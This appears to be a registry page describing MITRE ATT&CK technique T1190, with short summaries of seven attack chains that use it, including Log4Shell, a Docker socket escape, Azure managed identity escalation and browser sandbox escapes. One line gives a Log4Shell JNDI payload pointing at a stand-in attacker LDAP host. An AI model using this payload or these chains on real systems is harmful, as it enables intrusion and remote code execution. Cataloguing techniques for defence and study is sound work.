Exploit Public-Facing Application
Use vulnerabilities in internet-facing software.
§ Where this technique fits
T1190 is catalogued under the Initial Access tactic of the offensive-security kill-chain. It appears in 7 approved dossiers in the registry, typically at step 2.6 on average.
Authoritative reference: attack.mitre.org/techniques/T1190/.
§ Dossiers chaining this technique
- step 1 / 5
Renderer compromise → GPU process → vulnerable kernel driver
After renderer RCE, talk to the GPU process via IPC. GPU process sends ioctls to a vulnerable graphics driver — full kernel R/W; ring0 from a web page.
- step 1 / 6
Docker socket exposed in pod → host root
A workload mounts /var/run/docker.sock for convenience; spawn a container with the host root mounted, then chroot in for root on the node.
- step 1 / 5
Compromised VM → Managed Identity → Subscription Owner
A VM with an over-privileged system-assigned managed identity is compromised; query IMDS for an Azure AD token, then assign yourself Owner on the subscription.
- step 2 / 7
Dev workstation → cloud backup keys → encrypted vault store (LastPass 2022)
Attacker compromised a single LastPass DevOps engineer's home machine via outdated Plex Media Server, harvested AWS keys for the encrypted-vault backup bucket, exfiltrated production vault data.
- step 3 / 6
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- step 5 / 7
V8 type-confusion 1-day → renderer RCE
Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.
- step 5 / 6
Rowhammer → bit flip → in-browser sandbox escape
JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.
§ What commonly comes next
- 01Acquire Infrastructureseen 1×T1583 · Resource Development
- 02Azure Managed Identity Escalationseen 1×C-AZ-MANAGED-ID-ESC · Privilege Escalation
- 03Boot or Logon Autostart Executionseen 1×T1547 · Persistence
- 04Chromium Mojo IPC Confused-Deputyseen 1×BRW-CHROME-IPC · Privilege Escalation
- 05Docker Socket Exposedseen 1×K-DOCKER-SOCK · Initial Access
- 06Renderer → Broker Sandbox Escapeseen 1×BRW-RENDERER-SBX-ESCAPE · Privilege Escalation
- 07Valid Accountsseen 1×T1078 · Initial Access